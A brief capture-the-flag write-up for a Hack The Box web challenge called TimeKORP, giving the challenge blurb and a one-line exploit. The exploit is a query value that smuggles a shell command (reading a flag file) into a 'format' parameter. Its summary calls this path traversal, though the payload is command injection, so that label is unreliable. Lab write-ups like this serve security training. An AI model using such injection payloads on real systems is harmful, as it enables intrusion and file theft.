https://app.hackthebox.com/challenges/648

Description

Are you ready to unravel the mysteries and expose the truth hidden within Korp’s digital domain? Join the challenge and prove your prowess in the world of cybersecurity. Remember, time is money, but in this case, the rewards may be far greater than you imagine.

Exploitation

/?format=';cat ../flag'

Summary

TimeKORP: use path traversal to escape the intended read path and recover the flag.